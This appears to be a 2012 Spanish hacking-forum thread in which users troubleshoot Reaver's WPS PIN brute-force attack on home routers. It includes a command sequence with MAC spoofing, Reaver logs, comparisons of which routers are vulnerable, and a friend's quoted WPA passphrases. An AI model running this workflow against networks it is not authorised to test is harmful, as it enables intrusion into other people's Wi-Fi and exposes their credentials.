aam perdona otra cosa no es por nada en pero tu mismo que dices de los que  que no se puede hablar de hackeo vi algo tuyo en seguridad wireles hace tiempo que hablas de hackeo osea que lo que te quiero decir que despues riñemos a lo demas cuando tu también lo has echo con esto no quiero defender a nadie si no que la pagina no se llama el hacker por eso la gente algunas veces se confunde y pregunta o hablan del tema tu ya sabes lo que quiero decir.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 11 Mayo 2012, 05:02 am
no desvinculemos más el tema, si se notan sospechas... se aplicara el protocolo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ChimoC en 11 Mayo 2012, 21:09 pm
aam perdona otra cosa no es por nada en pero tu mismo que dices de los que  que no se puede hablar de hackeo vi algo tuyo en seguridad wireles hace tiempo que hablas de hackeo osea que lo que te quiero decir que despues riñemos a lo demas cuando tu también lo has echo con esto no quiero defender a nadie si no que la pagina no se llama el hacker por eso la gente algunas veces se confunde y pregunta o hablan del tema tu ya sabes lo que quiero decir.

Buenas:

En cuanto a que esta página se llama el hacker y que si no es normal que llamándose el hacker blablabla...está más repetido que el ajo....hacker no significa ladrón ni nada parecido. Además hay un post que habla sobre las normas de este subforo, al que no le guste o bien se queja de mi moderación al resto del staff, o bien las acata o bien postea en otro subforo.

Jamás he hablado de hackeo en el foro hermano de seguridadwireless

Como dice P4nd3m0n1um se aplicará el borrado de posts que incumplan las normas

ChimoC


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: longits en 12 Mayo 2012, 14:49 pm
Mi apoyo a ChimoC, las normas son claras, y aquí no se viene a reventar redes, sino a auditar las propias. Es vital comprenderlo.

Saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: kupu88 en 13 Mayo 2012, 21:07 pm
Hola:
Alguien me podria decir en que porcentage le a funcionado el Reaver.
Por que a mi, ya probe un pocos routers (legalmente), y solo me funciono con uno.

En mi caso solo me ha funcionado en el 5% de los casos.
¿y a vosotros?

A ver, creo que me explicado mal..
No me referia el porcentage del ataque...

Si no que queria saber en que porcentage de routers os a funcionado.
Yo en los router que pude haber probado (legalmente) solo me funciono en 1.
Solo queria saber hasta que punto es un peligro este ataque para el usuario de a pie.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 14 Mayo 2012, 02:12 am
A ver, creo que me explicado mal..
No me referia el porcentage del ataque...

Si no que queria saber en que porcentage de routers os a funcionado.
Yo en los router que pude haber probado (legalmente) solo me funciono en 1.
Solo queria saber hasta que punto es un peligro este ataque para el usuario de a pie.

3 de 3, Thomson, Kozumi, TP-Link


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: kupu88 en 14 Mayo 2012, 21:14 pm
mmm... curioso. Algo puede que este haciendo mal  :o
gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sol666 en 20 Mayo 2012, 10:44 am
hola,para empezar felecitaros porque sois unos maquinas.Queria preguntar si una vez lanzado el ataque con reaver se puede parar el airodump.GRACIAS


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: hacelo en 20 Mayo 2012, 21:22 pm
@sol666
Hasta donde yo entiendo el reaver, no tiene porque haber ningun problema para detener el airodump.

Ahora, eso bien facil lo tienes primero lanzas el ataque con el reaver, despues detienes el airodump y haber que pasa...... :silbar:

Saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 20 Mayo 2012, 23:13 pm
hola,para empezar felecitaros porque sois unos maquinas.Queria preguntar si una vez lanzado el ataque con reaver se puede parar el airodump.GRACIAS

@sol666
Hasta donde yo entiendo el reaver, no tiene porque haber ningun problema para detener el airodump.

Ahora, eso bien facil lo tienes primero lanzas el ataque con el reaver, despues detienes el airodump y haber que pasa...... :silbar:

Saludos.

para que utilizas el airodump? en este caso solamente te capturara las redes, pero no sabrás si tienen WPS Activado o no, debes usar Wash.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sol666 en 21 Mayo 2012, 21:39 pm
pues si,al parar airodump tambien se para el reaver no se porque


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sol666 en 3 Junio 2012, 01:35 am
hola, al cabo de 16 dias sin descanso he sacado mi clave wpa, el router es un tp link wr841n,la mac F8:D1:11:XX:XX:XX de cableworld


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 3 Junio 2012, 01:50 am
ejje buena sol666; calcula que yo tarde 20 días...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: valdemore en 3 Julio 2012, 11:30 am
Buenas, estoy haciendo pruebas en mi router de Orange y al ejecutar los comandos que habéis indicado y tal, da errores continuamente de WARNING! al enviar el paquete EAPOL y demás, pero lo curioso es que cada X tiempo aparece el mensaje del porcentaje y va creciendo, cada 10 minutos o así alomejor pone 0.25 % y va incrementándose en 0.10 % cada 15-20 min. Entonces mi duda es, ¿lo dejo a ver que ocurre y si me la saca o estoy haciendo algo mal por esos errores? También he de decir, que hay veces que se queda en un WARNING y de ahí no avanza, en 20 minutos que lo dejé, lo tuve que parar porque no cambiaba el mensaje. Ahora mismo no puedo poner el log de los comandos y demás, pero si los necesitáis los pondré lo antes posible.

Un saludo y gracias.

P.D. El router es un FTE-XXXX.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 13 Julio 2012, 20:16 pm
Buenas, estoy haciendo pruebas en mi router de Orange y al ejecutar los comandos que habéis indicado y tal, da errores continuamente de WARNING! al enviar el paquete EAPOL y demás, pero lo curioso es que cada X tiempo aparece el mensaje del porcentaje y va creciendo, cada 10 minutos o así alomejor pone 0.25 % y va incrementándose en 0.10 % cada 15-20 min. Entonces mi duda es, ¿lo dejo a ver que ocurre y si me la saca o estoy haciendo algo mal por esos errores? También he de decir, que hay veces que se queda en un WARNING y de ahí no avanza, en 20 minutos que lo dejé, lo tuve que parar porque no cambiaba el mensaje. Ahora mismo no puedo poner el log de los comandos y demás, pero si los necesitáis los pondré lo antes posible.

Un saludo y gracias.

P.D. El router es un FTE-XXXX.

Sigue probando, si el porcentaje sigue es que funciona, si va tan lento es porque el router o tiene bloqueo a X intentos, o directamente tienes el router lejos del PC que realizas el ataque, aunque si el router es tuyo eso dificil  ;-)

Os adjunto una captura, de que con las redes de ONOXXXX, MAC 74:44:01:XX:XX:XX funciona, el router es un NETGEAR. (Las XXXX son números todo).
Con permiso de el de arriba lo bombardeé un rato :P
(http://img254.imageshack.us/img254/8751/reavery.jpg)
Se comió unas cuantas horas, pero bien, lo dejas y te vas a por hay y cuando vuelves lo tienes :) , para más información, no hace falta hacerse pasar por un cliente asociado, y el chip es un AR9271 de la tarjeta que realizó el ataque :)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 15 Julio 2012, 01:29 am
Hola soy nuevo en esto quisiera que me ayudasen a como descargar e instalar el wpscrackgui porque la descarga la encuentro pero nose como instalarlo. Tengo wifiway 3.4 y backrack 5 r1 y r2 quisiera que me ayudasen tambien a como manejarlo. He probado el reaver 1.4 bajo blacktrack 5 y wifiway 3.4 y cuando me asocio al router me dice algo de wearing y sale muchas veces. Gracias de antemano saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sapito123 en 16 Julio 2012, 16:15 pm
porque cuando me llega al 99.9 % no me da la clave de mi router ?.
Alguien sabe porque puede pasar esto ?
Es posible que mi router cada vez tenga un pin distinto , o mute en función de la MAC de la antena que se quiere asociar ?

Mi router empieza por 8c:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 16 Julio 2012, 20:59 pm
El PIN del router no puede variar, y mucho menos por si solo... Por lo menos en mi Livebox no me deja :S, pero no se exactamente si se puede cambiar, creo que no, y como digo, menos por si solo.
Segun tengo entendido, lo que reaven hace, no es un ataque probando desde el PIN 00000000.. Si no empieza por el típico 1234567... Y va probando PINs posibles, es decir estrategicamente de routers conocidos, no lo hace a boleo.. Quizas en esa lista predefinida, no ande tu PIN  :-\.
Deja mas datos sobre tu router, los 3 primeros pares de dígitos del BSSID y si puedes el modelo y compañia, mejor  :)
Salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 16 Julio 2012, 23:03 pm
Haber yo he estado haciendo pruebas en casa de un amigo mio teniendo el router de Orange-xxxx livebox 2 sp, Modelo sagem bueno tengo todo los datos de momento no lo voy a poner aquí hasta que no me resuelva la duda, justamente al lado para mi es un privilegio que nunca he podido tener ese router tan cerca y poderle hacer un ataque directo vamos justamente mi portatil al lado  mi amigo no me dijo ni si la clave estaba cambiada ni nada aquí esta mi sorpresa yo me puse lo deje una hora y el router al lado  een pues no saco la clave para nada ni con el reaver que viene dentro del wifiway3.4 ni el del wifisla ni el wpscragui 1.1.7 ni nada saco porcentaje y se bloqueo este router por que se bloqueo pues facil por que la clave que tenia mi amigo de este router estaba cambiada hay esta la sorpresa me meti dentro de su router y mire el ssid no estaba cambiado ni nada ponia orange-fe88 se supone que si esta asin tu piensas que la clave esta por defecto verdad pues no señore esta cambiada por una personal lo que pasa que no cambia el ssid ni nada entoces mi preguntas por que a mi me saco el wpscragui y el reaver una clave wpa cuya clave era esta micarromelorobaron y la clave de orange-xxxx era esta vivaelsevillafcykanute por que si saca la otra clave que viene cambiada por defecto y del router orange no ?? alguien responde


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 16 Julio 2012, 23:24 pm
Siento decepcionarte, tengo el Livebox 2 y le tengo en casa. Al atacarlo, prueba unos pocos intentos, y peta.. Se bloquea, mañana o mas tarde si puedo hacer la prueba, te adjunto imagen del ataque y de que la clave del PIN no deja cambiarla, por lo menos en L firmware que yo tengo ^^
Salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 16 Julio 2012, 23:39 pm
HCK. vale tu lo tienes verdad yo no lo tengo lo probe hace poco en casa de un amigo el livebox 2 que el mismo que el tuyo vamos haber sacar un tanto por ciento llega hasta un 20 por ciento por haya vale despues se para y pone esperando y reciviendo respuesta todo eso en ingles despues de eso empienza probando pines como al principio yo se de sobra que el pin es el 12345670 pero claro el reaver o el wspcragui se supone que desisfra la clave que viene por defecto o la que sea verdad pues a mi se me quedo bloqueado el router de orange y tenia mi ordenador al lado vamos eso te lo juro yo por que me muera que no saca la clave ni de coña vamos de una orange-xxxx ponia 60 limite osea se bloque tras varios intento como siempre lo que me extraña es lo que yo dije antes que una wpa psk si me la saca y una orange WPA2 ccmp psk no la saca la clave estaba cambia no era la clave por defecto que viene en el router lo vuelvo a repetir no la saca por lo menos las de orange-xxxx tu dices que si la sacas me extraña ?? no se explicame como lo has echo por que yo ya me doy por vencido.EL PIN creo que lo puedes cambiar pero se vuelve al mismo pin a probarlo el pin si es ese el 12345670 lo que pasa que como la clave este cambiada el te lo da bien pero no te saca la clave el pin me imagino que te da la clave si la clave por defecto del router no esta cambiada me entiendes o yo no me explico bien.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 17 Julio 2012, 11:27 am
Haber, tranquilo. No vamos a dejarnos la vida escribiendo, que yo si que entiendo lo que quieres decirme.  :)
Haber, haciendo pruebas con mi Livebox 2, es cierto que el PIN se puede cambiar, asi que en eso te doy la razón. Pero lo que si sé, es que no puedes poner un PIN cualquiera, es decir por ejemplo 88888888... Solo deja poner ciertos PINs a la hora de cambiarlo, al azar no puedes... El único PIN que me dejó poner fue el de otro router, pero poner al azar no me dejó ninguno, porque al intentar ponerlo al azar, sale esto:
(http://img819.imageshack.us/img819/7396/pinp.png)
(La verificación del código PIN falló), el PIN puesto ahí fue al azar.
Por eso, cuando probe hace tiempo a cambiarlo, deje por descarte que no se podia.. Porque nunca pude cambiarlo con un PIN al azar, excepto hoy probando con el PIN de un router de ONO poniendolo en el Livebox.

Y ahora, te dejo una captura atacandolo, donde a X intentos, el router se bloquea, con o sin clave cambiada, si tienes suerte y es la de defecto, la tipica 12345670, pues bien, y si no, pues peta, y al petar, no se desbloquea en aproximadamente 24 horas.. Asi que no es viable atacarlo, si se ha cambiado el PIN.

(http://img576.imageshack.us/img576/1985/dsc0102wiq.jpg)

Solo me queda hacer la prueba, de si obtiene el PIN, tambien obtiene la WPA.. Eso lo mirare en un rato, en cuanto apague y encienda el router porque le he dejado petado del ataque de hace una hora.  :o
Salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 17 Julio 2012, 13:58 pm
Pues la verdad no se por que no te deja cambiar el pin , poniendo el que tu quieras eso esta mal o falla algo lo que me extraña es que tu le pones el pin de otro router y si te deja cambiarlo no se vamos algo raro ,yo en el router de mi amigo cuando cambio la clave del router que no es la clave por defecto si no es una clave personal que el puso que ya lo he puesto arriba tenia este tipo de clave VIVAELSEVILLAFCYKANUTE todo mayusculass y el modo de seguridad era esta la que yo vi en el router de orange-xxxx wpa/wpa2 (TKIP/AES) una clave personal sin embargo el pin no lo cambio mi amigo el pin se quedo el que tenia 12345670 la conclusión que yo saco es que la mayoría de la gente que tiene este tipo de router de orange es que cambia la clave que viene por defecto siempre y ponen ellos una personal y no le cambian el pin que tiene por defecto que es el 12345670 entoces que pasa pues cuando yo le voy hacer un ataque por reaver resulta que prueba con ese pin que si es el verdadero pero después alguna veces se cambia el numero del pin eso tiene que ser un fallo del reaver o algo no del router ni nada sabes otra cosa una vez prueba con ese pin que ya he dicho saca el mismos porcentaje que tu has puesto en esa pantalla y despues se bloquea por que se bloque ? pues pienso yo por que no es la clave por defecto este programa se supone que esta preparado para sacar la clave por defecto del router si no , no sirve verdad pues yo la pregunta que hago es la siguiente por que a mi me saco una clave wpa tkip psk normal que era una clave cambiada no era clave por defecto y las de orange-xxxx no saca la clave wpa2 cambiada ( no la que tiene por defeccto ) vale alguien me responde a esto a lo mejor el reaver necesita mas mejoras para atacar a este tipo de router y no esta preparado y habia que mejorarlo con palabras mayusculas todas que vaya jugando con la letras hasta que saque la clave lo que quiere decir es que el reaver no saca la clave cambiada aunque tenga el wps activado que es la prueba que yo hice y se bloqueaba como a ti te pone en la patalla exactamente igual sin embargo me saco una clave wpa normal psk con el ssid cambiado y no me dio la clave por defecto medio una frase que la persona tenia por que con esas wpa 00:19:15 lo hace y con las orange asin 00:19:70  no lo hace con ninguna por que todas estaran cambiada la clave sera por eso me entiendes aora lo que quiero decir verdad .gracias por responderme.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 17 Julio 2012, 14:36 pm
donde se descargar i como son los pasos para instalar el wpscrackgui? tengo wifiway backtrack y wifislax pero no encuentro la manera de instalarlo si alguien que lo tuviera me dijese los pasos que ha echo se lo agradeceria salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 17 Julio 2012, 15:43 pm
 adrihamel ola buenas si tienes el wifiway3.4 mas fácil descargarte el wpscragui la ultima versión mira en el foro viene donde descargarte el wpscragui de pandemonium, una vez te lo descargues lo metes en la carpeta modulo y ya esta, enciendes el wifiway3.4 normal y lo buscas y hay esta lo tienes que poner en modo monitor primero despues abre el porgrama del wpscragui y lo pones en mo0 y ya esta funciona  ;D  


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 17 Julio 2012, 16:10 pm
Más me extraña ami que no me deje cualquiera, y me deje el de otro router  :o, creeme. Supongo que solo se podrá poner ciertos patrones de claves a la hora de tratarse sobre WPS.
Hay en routers que ni puede cambiarse, como en el ataque anterior, donde subí esa foto que me daba la WPA tambien de un ONOXXXX, trastee en el router, que como dije, es del vecino y tengo permiso, y no podia modificarse el PIN.
Tambien, volví a poner el típico PIN, 12345670, y volví a atacar con reaver, en mi Livebox 2 y es el primer PIN que prueba, y se lo salta.. Es decir, no afirma que ese es el PIN, cuando realmente es ese.. Sigue probando PINs. Hasta que vuelve a bloquearse. Parece ser que los Livebox vienen bien preparados para los ataques de este tipo. :rolleyes:
Sí, se lo que quieres decir, pero no es por la clave.. Es por el router, hay routers que no tienen ningun tipo de bloqueo a ciertos intentos, y por ello puede probar tantos hasta que te devuelve la clave. El Livebox a los pocos intentos, corta el acceso por WPS, es la manera de protección que tiene ante este ataque.
Muchos no tienen protección, pero esta gama de routers sí. Y se a lo que te refieres, porque las ONOXXXX con WPS y router NETGEAR se las come con patatas, puede probar intentos hasta que te da la el PIN con la WPA, da igual el ESSID, si tiene WPS activado el falló esta disponible para ser explotado.
¿Por curiosidad, con que tipo de chip realizas el ataque?, ¿te funciona a ti walsh?
Un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 17 Julio 2012, 16:59 pm
Yo he utilizado dos programas haber el wifiway3.4 el walsh no funciona por el fallo que tiene y todo eso después en el wifilax, la ultima versión si funcionar perfectamente el walsh y bifite 2.1 o algo asín que también te dice si tienes el wps activado  en wifislax que es mejor , haber yo hago el ataque desde mi portatil es un acer extensa 5235 y el chip es AR9280 DRIVER ath9k - (phy0) vamos me va bien y lo detecta perfectamente tiene que ver mucho el chip de la tarjeta para que pueda desisfrar este tipo de claves con el reaver yo estoy pensando hacer una cosa ponerle una atena alfa de esa exteriores haber si con la antena es verda que puede sacar la clave o no tiene nada que ver dimee el pin verdadero de esta orange esta claro que el 12345670 lo que pasa que no te saca la clave por la clave la tiene cambiada normalmente los usurior cambia la clave nunca deja la de por defecto pienso yo que si mi amigo deja la de por defecto del router de orange deberia sacarlo verdad eso si es verdad lo que tu dices puede ser que estos router este bastante preparado para este tipo de ataque y por eso no tiene huebo de sacarlo el programita eso quiere decir que son bastante seguras y demomento no tiene grieta las orange por lo que veo .


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 18 Julio 2012, 00:58 am
Si, el walsh va como el culo en Wifiway. Wifislax hace que no lo uso, la tira de tiempo haha. El ataque con reaver, atacando con el AR9271 no tengo problema, tambien tengo una Alfa de 1W, con RT3070, y con reaver no da más que problemas.
Yo ya te digo, ataque el mio desde el principio, con el WPS activado, el PIN 12345670 y al atacarlo, reaver lo probó, y siguió probando PINs sin demostrar que el 12345670 era el autentico, y habiendolo probado. Así hasta que a los pocos intentos, se bloqueó.
Vienen muy bien protegidos, yo no solo probe a atacar al mio, si no a otros más y obtuve el mismo resultado con todos.
Un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 18 Julio 2012, 01:18 am
Hola soy nuevo en esto quisiera que me ayudasen a como descargar e instalar el wpscrackgui porque la descarga la encuentro pero nose como instalarlo. Tengo wifiway 3.4 y backrack 5 r1 y r2 quisiera que me ayudasen tambien a como manejarlo. He probado el reaver 1.4 bajo blacktrack 5 y wifiway 3.4 y cuando me asocio al router me dice algo de wearing y sale muchas veces. Gracias de antemano saludos
Sobre wpscrackgui, tienes un hilo específico donde puedes preguntar  ;D , allí te responderan.
Yo nunca lo usé, prefiero a puro y duro comando ^^ jeje.
Si te sale eso, puede ser por lo que hemos hablado por aqui, a X intentos corta. Si puedes especificar más datos del AP, encantados de la vida .
Tendriamos que hacer una base con routers vulnerables y no vulnerables, nos seria util  :rolleyes:
Un saludete


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 18 Julio 2012, 10:10 am
Sobre wpscrackgui, tienes un hilo específico donde puedes preguntar  ;D , allí te responderan.
Yo nunca lo usé, prefiero a puro y duro comando ^^ jeje.
Si te sale eso, puede ser por lo que hemos hablado por aqui, a X intentos corta. Si puedes especificar más datos del AP, encantados de la vida .
Tendriamos que hacer una base con routers vulnerables y no vulnerables, nos seria util  :rolleyes:
Un saludete
muchisimas gracias por la ayuda, pero estuve probando el reaver 1.4 con una wlan_xxxx que se que el pin por defecto es 12345670 y la contraseña no esta cambiada es la de fabrica y a los dos segundos salio (la mac es 00:19:15) pero luego probe con una de onoxxxx y le cambie la contraseña por defecto y el pin era 8345 (no pongo el resto por seguridad) y no me dio la clave solo me dio el pin. Entonces yo creo que el reaver consigue la wpa o wpa2 de los routers que no han cambiado la contraseña, corregirme si me equivoco. salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 18 Julio 2012, 10:17 am
adrihamel ola buenas si tienes el wifiway3.4 mas fácil descargarte el wpscragui la ultima versión mira en el foro viene donde descargarte el wpscragui de pandemonium, una vez te lo descargues lo metes en la carpeta modulo y ya esta, enciendes el wifiway3.4 normal y lo buscas y hay esta lo tienes que poner en modo monitor primero despues abre el porgrama del wpscragui y lo pones en mo0 y ya esta funciona  ;D  
vale ya me lo descargue de hay pero la carpeta modulos, cuando lo meta, iene que estar el wifiway en un cd o en un usb? esa es mi duda. Y cuando lo tenga ya en l carpeta solo es iniciarlo y ya te aarece en wps del menu de wifiwaY? salu2 y gracias por todo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 18 Julio 2012, 11:42 am
muchisimas gracias por la ayuda, pero estuve probando el reaver 1.4 con una wlan_xxxx que se que el pin por defecto es 12345670 y la contraseña no esta cambiada es la de fabrica y a los dos segundos salio (la mac es 00:19:15) pero luego probe con una de onoxxxx y le cambie la contraseña por defecto y el pin era 8345 (no pongo el resto por seguridad) y no me dio la clave solo me dio el pin. Entonces yo creo que el reaver consigue la wpa o wpa2 de los routers que no han cambiado la contraseña, corregirme si me equivoco. salu2

No lo se exactamente, lo de si cambian la WPA, el reaver te dá solo el PIN y no la WPA. Haré unas pruebas con un Comtrend que tengo en casa con WLAN_XXXX de cuando estuve con telefónica, haber que ocurre.
A la tarde si tengo un rato te publico resultados  :P


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ChimoC en 18 Julio 2012, 11:53 am
el reaver te dá solo el PIN y no la WPA.

Buenas:
@HCK. que yo recuerde reaver te da tanto la WPA com el PIN (aunque ya me hago viejo  >:D )

Saludos ChimoC

P.D.: Recuerda que ahora se llama wash y no waLsh


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 18 Julio 2012, 14:31 pm
Buenas:
@HCK. que yo recuerde reaver te da tanto la WPA com el PIN (aunque ya me hago viejo  >:D )

Saludos ChimoC

P.D.: Recuerda que ahora se llama wash y no waLsh

Cierto, fallo mio. Es más, pongo una imagen donde muestra el PIN y la WPA :) . En alguna ocasion con ciertos routers me ha llegado solo a dar el PIN, pero con algun router contado, pero varias veces me ha devuelto los dos :).

Gracias por la correción.

Un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 19 Julio 2012, 23:29 pm
Es verdad tendríamos que recopilar datos para lo router que no son vulnerables y poder hacer una gui lo que pasa que yo de programación no entiendo si alguien sabe yo soy el primero en aportar datos de las orange que tengo mas información y vodafon también. gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 20 Julio 2012, 02:34 am
Yo tambien aportaria mi granito, tampoco sé sobre programación pero tengo varias redes alrededor de Orange, y de vodafone unas cuantas ^^ .

Un saludete :P



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 20 Julio 2012, 10:27 am
Seria una idea genial ya que mucha gente suele preguntar el porque el router solo te da el pin y no la clave o el porque el router te dice que esperes 60 segundos para robar otro pin. Todo eso se puede poner en un gui diciendo que routers pasan eso con sus respectivas macs y cuales son vulnerables. Teniamos que aportar nuestro granito para contribuir en esto. Yo tengo a disposicion varios routers de vodafone/Vodafone, orange, wlan y jazztel wpa2 salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 20 Julio 2012, 14:58 pm
Hola soy nuevo aqui y eso de poner datos me parece una buena idea por que mucha gente necesita saber si su router es vulnerable al final lo conseguireis


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 20 Julio 2012, 15:01 pm
por cierto las vodafone con las mac 64:16:F0 queria saber si es vulnerable a este ataque de reaver por que yo he probado con mi router que es asin y va cambiando de pin pero a un cierto punto de intentos de pines se para y lo pongo otra vez y avanza pero poco a poco quiero saber si ese modelo me dara la clave o solo el pin


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 21 Julio 2012, 00:30 am
verifica si te ocurre lo mismo con la version 1.3, ya q se han encontradp redes que unicamente se pueden crackear con esa version


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 21 Julio 2012, 01:26 am
yo utilizo la version reaver 1.4 pero quiero saber si podre sacar mi vodafone espero una respuestas salud


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 21 Julio 2012, 15:40 pm
 ¿ Y que redes son las que se pueden sacar con el reaver 1.3 que no saca el reaver 1.4 si lo puedes decir te lo agradecería ? Y para intalar el reaver 1.3 que tengo que desistalar el reaver 1.4 del wifiwa3.4 pregunto para proba si es verdad con la otra versión saca alguna claves gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 22 Julio 2012, 02:02 am
me podeis decir todas las redes vulnerables por favor o algunas vodafone o lo agradeciria mucho espero sus respuestas salud


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 23 Julio 2012, 00:05 am
alguien de aqui ha sacado alguna vodafone con ese tipo de mac


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: maik78 en 23 Julio 2012, 11:45 am
Buenas a todos,
Gracias por darnos soporte...
A ver voy con mi problema, tengo broadcom y solo hago funcionar el wifislax 4.1 beta 3 por ahi por donde intento sacar la clave de onoxxxx, pero no sé si lo hago mal o no espero el suficiente tiempo.
Hago los siguientes pasos:

airmon-ng start wlan0

Abro el wireshark, busco la red que tenga WPS

Cambio la MAC
macchanger -m 00:11:22:33:44:55 mon0

airodump-ng mon0

reaver -i mon0 -b ESSID ELEGIDA -vv

Y se mete en un bucle de canales, lo más interesante que me sale es esto:

[!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
    [!] WARNING: 25 successive start failures
  • Sending EAPOL START request
  • Sending WSC NACK
  • [!] WPS transaction failed (code: 0x02), re-trying last pin
  • Nothing done, nothing to save.
  • 0.00% complete @ 2012-07-22 10:03:19 (0 seconds/pin)
  • Trying pin 12345670

Y al final lo quite a las 20 horas de no tener resultado.
Es normal?? Tengo que esperar más??
Muchas gracias.




Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 23 Julio 2012, 14:30 pm
Alguien ha sacado alguna fte-xxxx modelo sagem con wps activado


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 23 Julio 2012, 14:32 pm
maik78 quizas la ono esa tenga el wps activado pero no se vulnerable al ataque de reaver dime la mac y mas datos sobre esa red y tu has sacado alguna vodafone salud


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: maik78 en 23 Julio 2012, 14:59 pm
Buenas GOolden a ver yo en esto de las WPS estoy verde... Como he dicho antes es una ONOXXXX con MAC 30:46:9A... con seguridad WPA2...

Me extraña lo de no ser vulnerable, por lo que he visto las WPS son vulnerables al 95%

Saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 23 Julio 2012, 16:18 pm
Hola maik78 quizas ese router no es vulnerable a ese ataque es que hay router que aunque tengan el wps activo no son vulnerables al reaver tambien influye la distancia que este el router de ti hay mucha distancia


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 23 Julio 2012, 18:22 pm
broadcom no es compatible con reaver.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 23 Julio 2012, 20:23 pm
P4nd3m0n1um tu has sacado alguna red con esta mac 64:16:f0


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 24 Julio 2012, 01:39 am
@GOolden: no existen en mi pais..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 24 Julio 2012, 10:13 am
Sending EAPOL START request
Sending identity response
Sending M2 message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending M2D message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending WSC ACK
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Got packet type 19 (0x13), but haven't broken the first half of the pin yet!
           que significa esto todo va bien va cambiando de pin pero ha un cierto intentos de pines se para lo pongo otra vez y sigue avanzando es una red vodafone que estoy haciendo pruebas y quiero saber si conseguire la clave o no pero va cambiando de pin con esos mesages que o epuesto y se para ha cierto intentos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: maik78 en 25 Julio 2012, 00:05 am
